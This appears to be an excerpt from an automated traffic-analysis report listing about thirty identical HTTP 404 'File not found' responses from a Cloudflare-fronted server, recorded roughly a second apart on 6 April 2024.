Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQlf5%2FacuzMTkhNJgzGLZhnCDuGZmEryVICVmz8xDF2ym%2BMi4i7DOkuSoaCgT74FoHB6xKgbwl8rtWhhz7ialFEoMikReHzqGOJ9%2BC8VZ5c0je%2Fuz1iaXknZeIzeSMrHEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700111bf94031de-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONA6rX4dIjq0FRHXmN2kZ2ccbZE0DrIAdlgCB4hb9%2BhB5awqiHVQdw0zJ9gYMvjjpyVI6dId2b2qCQUbpsYS0%2F%2FYCIGRzKVvpGciEWNfUjS76H1RteYAGfMg13Fg4FEjNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001120dc640a3a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9i5I%2BracQCcxDtbpzUbdOiX6%2FwkWRPKLgdxykSAcPP5CjaxHsaHVZa1YDUJdptqhRfzPfxD%2FaFi0C%2BHMPSfZZ9JzwAhWYF5c8%2BpL4YG4aOVdNDz7lHnufK8iWqkzyj16%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001125c8cb9acc-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUmyiwEd2zpFZsUAyI2ESZOLJ3RoFI7xRP1ztasVJ5FQvs81KArTtNXS6KS2kmknhMM%2B%2FV8n0kB5ECzTTsMO%2B52kW2Eg2Bts85aNV8XIq2p8Hvwfs1kLIeu%2BCoD1wV4lyQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700112acc7d746d-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfO5XLLVxWaNiZKsnR3N%2Bzt1JjZxCOKWjjtU00rPBkBavNUBwoMEFYq5md3Y%2FvsYKJgxzqV6u41vqHNPK1NmzL5KJoI9FP%2FlMNbgYk7sZz9olEJB0kpeRdnKBLJDJEQreg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700112f9d543716-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMZnBkdceyFE2b24b%2BfYVFN6ykyVZABVUSCTOE5OIzeiw%2FNdCqW63u01LzCdepKlTKvXU9cfx%2B5f8ttgfMJfgJQz30osK1oYB8ONphvfv%2F4kakHTSmGASlFA2%2BkOldEypg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011347f8e336a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Ao6YPXXkWHvRESy3tdUirn6gNtrA5tNz359v%2FbNuuJIqYSZNZBCRfEqElWXbxfy5EIdXxKd9qdvm2pyJM3OWFQ%2BE%2BcBB66MOQI3zQFRJQCy5v3iYgmyilEc5%2B5b6bMWqQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700113b0e78a560-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vj57YDwUvjiFWtx7WNXCXL6I2aHdsAEO%2FUtJ0efrycQINbWbAOAVxIbRPWjkUiBFM4kHzP0J%2FRxvu4zA8I%2B49Hi5O6aDGx3JQ9WWvlg8OGsPDx%2BKjXGIizHKzvQLx1%2BIw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011477836dad5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpcO4e2MmBG8j6ozX8bgTowbyzV5rECbGdYseCZ6Zkq%2BF77mx9p%2B1VWaSNglSIxEe7ThtaBYDTnYt%2BDZoUbO0Hd1GnVJl9EjR4S6%2B00CE9pb1DTZyeD00OUfac5tYzVmpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700114c686b9acb-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZAAR69kvm8pG%2BzEIMCKOWZWQtij1b1yDdUxNreY8JpoB5zd0hv08VnYUMWkxYGqGYvhOjN6GdyQcicEN2o5S3Rf6%2FVERPIR0iiGXUpYMWNA%2BXTiwvx4f%2FVUT8mjC%2Fh4NQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011514e04a4f4-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tx6YIKEpJ2IyF45rEKr%2BVGrtTVGOXmSpMrhrPhzQKwOUkQfIoTREnWAvJssubCQw9AwhJtlt2xNO6mTQRn%2Fl%2BV1J94m0ZZhWX0cgML1ZS1SBKRnWtxMAWcSTBEuI2xCBgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011568bc831e6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCAAOS1pSnGhzyPQRn5rHK9nAzs9RSoknv67Z4pmfqeXP11pEi31W0UsP%2BtA6QOIffEWbhNl3HgXQmdeSnvzTeN%2F5ln%2BWkCrnQDzXghK%2FW3FjZqruM2rnsHpMe1OSJkivg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700115b7d46a569-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXhtAyGeRIx8GsNU2BQ6IwXoQi7BerEUnab%2BGEd6cNL4sDv%2B02StVEc12eA2Prp%2BEUb7P6aIgUMxZUKRUJTQceN0JC0Yy%2FKuItRKaH6YGfXtMFTufL9eac5VXAoEHoVEJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700116048bb31fb-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZEV7kfho2DE7dnxvYx8F6ESdhQ4g3ROHp6CzmI0n%2FIRBx%2FW7NZW76sFvw3AIodXS3zdzWEYNt7XIxZ4QBJFvIbwRNTOVO%2FCMJw2GypTFLRf3va2%2Fo%2FTq05Ib5VU8s7Oew%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700116528058dfd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbwoXtrwjnbLLJh2mjQBP3L8Q%2FQ9pjSWpMWyDobn%2B6qrh94YlzTJBUvJuDzv%2FBu5n0SlZu6MtQm4jHQlkpMY4WUI7K3%2FFLTJV5lO%2Fko%2BHberpdORawHw4Kml3Xjpz2codg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001169ee4209ae-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDoZIGymzIO5AiUbLpndDKq51%2B%2BU1SHXZHfvIcgKLLtOHE%2BfBNBZLtEbGRHTrrX9Bxs%2B3E8%2FMWTejOaeQIGEUpn2Kl6Vp0ug4o4orN1Z%2FRQTriavg6wbcA8rXNAZvAP%2BXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700116ecddc571e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axEIlhmqw5LyDyYO4mpyOKLAP4kkPBuPq0PWlxSgX0Y71PS1LzKT2jSVbWRxkOzDVStzjzYt8XSqka7N0Zz8w18cT6PjX9FfxWeUj9DYIM4%2BQ4lCBC0gLayfrmoHtPdozQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011738d7721e7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLEeF4dvhsLMBGj7TPGkdWq0TkKrERdjiBM24LeQbyNWp8aMbcjqbrxgHU%2Fk1qXT76FOOpiBhn%2BMetIEsghpHcoJGwuXFhrLvYjRzTpAvtdVqL1w1SNp9OXSkLfOiyuPJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011785ba28dc7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9q%2FDE0bzkgkeri83BEpg28cjFqZIHWRB7yTUaZJhY8J%2F3mnOlupBFuWRZmvf4oG0DWiUaP2f9BPrbdd59Fx4kBAsEZI%2BT66Er%2BeJnojVOFrKNgsPuKlj%2FEauWgcxJerCNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700117d3d8e7428-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHtzMw8gqyd8ww1EK1BgwMNXzUJTGHFVAIS4yI4QX9upxi0Vv4op3VN1t207upcjUS3yzm5zUWQ00rJ%2BcdKmRpWy6QG1e3lpBoy5%2BnkGGt0VRKU4gJYiwt%2FtVOJC6ALoIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011823de431dd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvX843q7lulzsHsL78ZIETT0odUBFAq%2BajQIO5XuLZNpzUBkQy4gN4dfiNIwb0K8eKo0NhP3hrAFwy0tjE0suoqQtJrDJ9g8ww3Y%2BuNQgbPLTl%2BT%2FONafuml5w%2FQ9IM3vQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001186fc179ad2-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckbKu7yUVBSLi3epH5Ta25Kkmzmm6thGYGLYC6qL1H5gdY7OYA61onKL5dTE1%2B8ERio%2FO19RSmj95WnvMcUZ3TwAO9ql0L0ErwMu0jCZLqH3%2B6ujcNOZNukUlNZczV5L2Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700118beb403364-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdA0pcdPBW59ITYBSbOrJwETnAqWQPCO8%2FIn2wKamMM%2BZzbydoO1Cmw4WOHKQ2FvA8tqhuOyrDhez8xDMjI0zCvlGTzIMBR3ONyXzCPwexJj12Wm%2F2qnmXJ7tw2RGK9fCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001190cdeb3352-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZfQRUrB2SdT1eLJyZbio7KvUrEiavKy6urIyN8%2B5G3P7sde62aoet1UR%2BYMfBvosLW0RYLoyF1G78C%2F2InL2kYsYst4Kfxd%2FEI%2FUTIjSRbE4P9zSRqZ4NE9pp34fpTqNDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001195aecda512-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WoTy8CytH6FCGJ02FnvnJQaOiLpecp8e28%2ByX1uRiZ4CSBTOCeaW6ZaVGSgaHxFmcxS7lBIQM8gyYJwoov7ksoTD86qCD9xFptaRmKV2l7GNItYd6wSvF1VnZUyXdf2Sw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700119a8a67259a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0XodsU6cTpRgul%2BX7ABl17NCZf%2B2hOOH6toQ7msxzgWFuWswfOGEMqSD53AbJakF%2F3rJYxejlf2BPbI8geSPJZX4lnqL05P%2FcNIFJ%2FjADLCVtqXiNeMJggRv6YzGwfRiHQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700119f8cfe21b5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU6XjyB3%2FNRhFBAew165kUx%2B1dACg6uaxbUHhHekBPp4GbNiULy0hq7LyatbVe3K7%2BD5opbbHmzIhAHb7fOgRDlWs%2FaqjJ7G6hNRVmNvpxZ04odVQ7zWC%2BEiFwBW5gPUgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011a4882c5f20-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q63pSfh%2BvejxmCMXLjq0feEjlXe1RY11XvfTfG4xIeMQNPbKAYgakjNORoVfP2RRr2OI6%2FEl4y%2FhgKpIawLCwTRd44XySgK%2BVSCkS1BC8ske%2B%2Bu5I8qFai4yiCazp3UWyg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011b6ecd5a56c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXvxEsoq2uHiFTG6y0KzIfAQ4PaiUOF%2B2l8XKYyuFbQMOcpj6cVSr9iV7YMEsyMLc%2F0C%2FfrIJLlSI%2Fsi%2FAoNjqWFlxl75VKaowJr1SiAFazauaXI95pEeREKKO4D7WLEdg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011bbe9f78dac-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdVSgMhGj1pcUmIxcBj7mZL3m0UDsubMCJrwQCdbs1FVrot6kbiKluvGLmQ5pu%2FHi%2FXQoEqyUDwNUeGox%2FM62WTJmLAanTtEGT0G9%2B5WMyt9FmB0wDX%2F9l5jQ380na%2Fbbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011c0d928a558-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKgDapP8JSaXx2iTlrukWhm5OwI4gu1NXTdiDzxtla4B3YSuaO9FRU0F20FZcCb4DdOOWWCGQTgPgZbBUZ%2FPjUsBfzcQCIzCjXahAvSSmRFjOL9rFeca84vMTE7Mr7GHoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011c598f7da8b-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecJkXhLfYbCmlHR9zhHpRGgH%2BmTMGQY2MLHJCHbz9BtssggRKnPCcBRmxGrLO0MM26vcuQe%2BU0dWq%2Bi%2FX707b5GFvH41vA88g%2FLU%2FTA%2B1ACmm4HkCRHDYth%2FBtgjnLxVsA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011ca8d2c8dfc-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
